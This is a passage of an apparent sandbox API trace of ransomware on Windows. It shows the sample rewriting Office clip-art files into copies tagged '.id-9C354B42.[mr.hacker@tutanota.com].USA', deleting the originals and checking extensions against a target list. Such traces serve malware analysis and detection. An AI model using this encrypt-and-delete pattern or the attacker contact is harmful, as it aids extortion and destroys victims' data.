lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x2420, lpOverlapped=0x0) returned 1 [0053.427] WriteFile (in: hFile=0x228, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x2430, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x2430, lpOverlapped=0x0) returned 1 [0053.428] ReadFile (in: hFile=0x200, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.428] WriteFile (in: hFile=0x228, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.428] SetEndOfFile (hFile=0x228) returned 1 [0053.428] CloseHandle (hObject=0x228) returned 1 [0053.428] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.428] SetEndOfFile (hFile=0x200) returned 1 [0053.429] CloseHandle (hObject=0x200) returned 1 [0053.429] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.429] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00170_.gif")) returned 1 [0053.430] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63 [0053.430] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63 [0053.430] lstrlenW (lpString=".doc") returned 4 [0053.430] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.430] lstrlenW (lpString=".docx") returned 5 [0053.430] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.430] lstrlenW (lpString=".pdf") returned 4 [0053.430] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.430] lstrlenW (lpString=".xls") returned 4 [0053.430] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.430] lstrlenW (lpString=".xlsx") returned 5 [0053.430] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.430] lstrlenW (lpString=".ppt") returned 4 [0053.430] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.430] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63 [0053.430] lstrlenW (lpString=".zip") returned 4 [0053.430] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.430] lstrlenW (lpString=".rar") returned 4 [0053.430] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.430] lstrlenW (lpString=".bz2") returned 4 [0053.430] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.430] lstrlenW (lpString=".7z") returned 3 [0053.430] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.430] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63 [0053.430] lstrlenW (lpString=".dbf") returned 4 [0053.430] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.430] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63 [0053.430] lstrlenW (lpString=".1cd") returned 4 [0053.430] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.430] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63 [0053.430] lstrlenW (lpString=".jpg") returned 4 [0053.431] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.443] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.449] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.453] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00172_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0053.669] GetLastError () returned 0x0 [0053.673] ReadFile (in: hFile=0x200, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x1126, lpOverlapped=0x0) returned 1 [0053.703] WriteFile (in: hFile=0x178, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x1130, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x1130, lpOverlapped=0x0) returned 1 [0053.704] ReadFile (in: hFile=0x200, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.704] WriteFile (in: hFile=0x178, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.704] SetEndOfFile (hFile=0x178) returned 1 [0053.704] CloseHandle (hObject=0x178) returned 1 [0053.704] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.704] SetEndOfFile (hFile=0x200) returned 1 [0053.705] CloseHandle (hObject=0x200) returned 1 [0053.705] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.705] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00172_.gif")) returned 1 [0053.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63 [0053.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63 [0053.705] lstrlenW (lpString=".doc") returned 4 [0053.705] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.705] lstrlenW (lpString=".docx") returned 5 [0053.705] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.705] lstrlenW (lpString=".pdf") returned 4 [0053.705] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.706] lstrlenW (lpString=".xls") returned 4 [0053.706] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.706] lstrlenW (lpString=".xlsx") returned 5 [0053.706] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.706] lstrlenW (lpString=".ppt") returned 4 [0053.706] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63 [0053.706] lstrlenW (lpString=".zip") returned 4 [0053.706] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.706] lstrlenW (lpString=".rar") returned 4 [0053.706] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.706] lstrlenW (lpString=".bz2") returned 4 [0053.706] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.706] lstrlenW (lpString=".7z") returned 3 [0053.706] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63 [0053.706] lstrlenW (lpString=".dbf") returned 4 [0053.706] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63 [0053.706] lstrlenW (lpString=".1cd") returned 4 [0053.706] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63 [0053.706] lstrlenW (lpString=".jpg") returned 4 [0053.706] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.706] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.707] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.707] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01216_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0053.707] GetLastError () returned 0x0 [0053.707] ReadFile (in: hFile=0x200, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x16cc, lpOverlapped=0x0) returned 1 [0053.709] WriteFile (in: hFile=0x178, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x16d0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x16d0, lpOverlapped=0x0) returned 1 [0053.710] ReadFile (in: hFile=0x200, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.710] WriteFile (in: hFile=0x178, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.710] SetEndOfFile (hFile=0x178) returned 1 [0053.710] CloseHandle (hObject=0x178) returned 1 [0053.710] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.710] SetEndOfFile (hFile=0x200) returned 1 [0053.711] CloseHandle (hObject=0x200) returned 1 [0053.711] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.711] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01216_.wmf")) returned 1 [0053.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63 [0053.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63 [0053.712] lstrlenW (lpString=".doc") returned 4 [0053.712] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.712] lstrlenW (lpString=".docx") returned 5 [0053.712] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.712] lstrlenW (lpString=".pdf") returned 4 [0053.712] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.712] lstrlenW (lpString=".xls") returned 4 [0053.712] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.712] lstrlenW (lpString=".xlsx") returned 5 [0053.712] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.712] lstrlenW (lpString=".ppt") returned 4 [0053.712] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63 [0053.712] lstrlenW (lpString=".zip") returned 4 [0053.712] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.712] lstrlenW (lpString=".rar") returned 4 [0053.712] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.712] lstrlenW (lpString=".bz2") returned 4 [0053.712] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.712] lstrlenW (lpString=".7z") returned 3 [0053.712] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63 [0053.712] lstrlenW (lpString=".dbf") returned 4 [0053.712] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63 [0053.712] lstrlenW (lpString=".1cd") returned 4 [0053.712] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63 [0053.712] lstrlenW (lpString=".jpg") returned 4 [0053.712] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.713] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.713] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.713] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01218_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0053.713] GetLastError () returned 0x0 [0053.713] ReadFile (in: hFile=0x200, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0xbc4, lpOverlapped=0x0) returned 1 [0053.715] WriteFile (in: hFile=0x178, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xbd0, lpOverlapped=0x0) returned 1 [0053.716] ReadFile (in: hFile=0x200, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.716] WriteFile (in: hFile=0x178, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.716] SetEndOfFile (hFile=0x178) returned 1 [0053.716] CloseHandle (hObject=0x178) returned 1 [0053.720] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.720] SetEndOfFile (hFile=0x200) returned 1 [0053.721] CloseHandle (hObject=0x200) returned 1 [0053.721] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.721] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01218_.wmf")) returned 1 [0053.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63 [0053.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63 [0053.722] lstrlenW (lpString=".doc") returned 4 [0053.722] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.722] lstrlenW (lpString=".docx") returned 5 [0053.722] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.722] lstrlenW (lpString=".pdf") returned 4 [0053.722] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.722] lstrlenW (lpString=".xls") returned 4 [0053.722] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.722] lstrlenW (lpString=".xlsx") returned 5 [0053.722] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.722] lstrlenW (lpString=".ppt") returned 4 [0053.722] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63 [0053.722] lstrlenW (lpString=".zip") returned 4 [0053.722] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.722] lstrlenW (lpString=".rar") returned 4 [0053.722] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.722] lstrlenW (lpString=".bz2") returned 4 [0053.722] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.722] lstrlenW (lpString=".7z") returned 3 [0053.722] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63 [0053.722] lstrlenW (lpString=".dbf") returned 4 [0053.722] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63 [0053.722] lstrlenW (lpString=".1cd") returned 4 [0053.722] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63 [0053.722] lstrlenW (lpString=".jpg") returned 4 [0053.722] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.723] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.723] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.723] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01251_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0053.723] GetLastError () returned 0x0 [0053.723] ReadFile (in: hFile=0x200, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0xac4, lpOverlapped=0x0) returned 1 [0053.727] WriteFile (in: hFile=0x178, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xad0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xad0, lpOverlapped=0x0) returned 1 [0053.728] ReadFile (in: hFile=0x200, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.728] WriteFile (in: hFile=0x178, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.728] SetEndOfFile (hFile=0x178) returned 1 [0053.728] CloseHandle (hObject=0x178) returned 1 [0053.728] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.728] SetEndOfFile (hFile=0x200) returned 1 [0053.729] CloseHandle (hObject=0x200) returned 1 [0053.729] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.729] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01251_.wmf")) returned 1 [0053.729] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63 [0053.729] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63 [0053.729] lstrlenW (lpString=".doc") returned 4 [0053.729] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.729] lstrlenW (lpString=".docx") returned 5 [0053.730] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.730] lstrlenW (lpString=".pdf") returned 4 [0053.730] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.730] lstrlenW (lpString=".xls") returned 4 [0053.730] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.730] lstrlenW (lpString=".xlsx") returned 5 [0053.730] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.730] lstrlenW (lpString=".ppt") returned 4 [0053.730] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.730] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63 [0053.730] lstrlenW (lpString=".zip") returned 4 [0053.730] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.730] lstrlenW (lpString=".rar") returned 4 [0053.730] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.730] lstrlenW (lpString=".bz2") returned 4 [0053.730] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.730] lstrlenW (lpString=".7z") returned 3 [0053.730] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.730] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63 [0053.730] lstrlenW (lpString=".dbf") returned 4 [0053.730] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.730] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63 [0053.730] lstrlenW (lpString=".1cd") returned 4 [0053.730] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.730] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63 [0053.730] lstrlenW (lpString=".jpg") returned 4 [0053.730] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.731] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.731] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.731] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01545_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0053.731] GetLastError () returned 0x0 [0053.731] ReadFile (in: hFile=0x200, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x1ccc, lpOverlapped=0x0) returned 1 [0053.734] WriteFile (in: hFile=0x178, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x1cd0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x1cd0, lpOverlapped=0x0) returned 1 [0053.735] ReadFile (in: hFile=0x200, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.735] WriteFile (in: hFile=0x178, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.735] SetEndOfFile (hFile=0x178) returned 1 [0053.735] CloseHandle (hObject=0x178) returned 1 [0053.735] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.735] SetEndOfFile (hFile=0x200) returned 1 [0053.736] CloseHandle (hObject=0x200) returned 1 [0053.736] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.736] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01545_.wmf")) returned 1 [0053.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63 [0053.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63 [0053.736] lstrlenW (lpString=".doc") returned 4 [0053.736] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.736] lstrlenW (lpString=".docx") returned 5 [0053.736] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.736] lstrlenW (lpString=".pdf") returned 4 [0053.736] lstrcmpiW 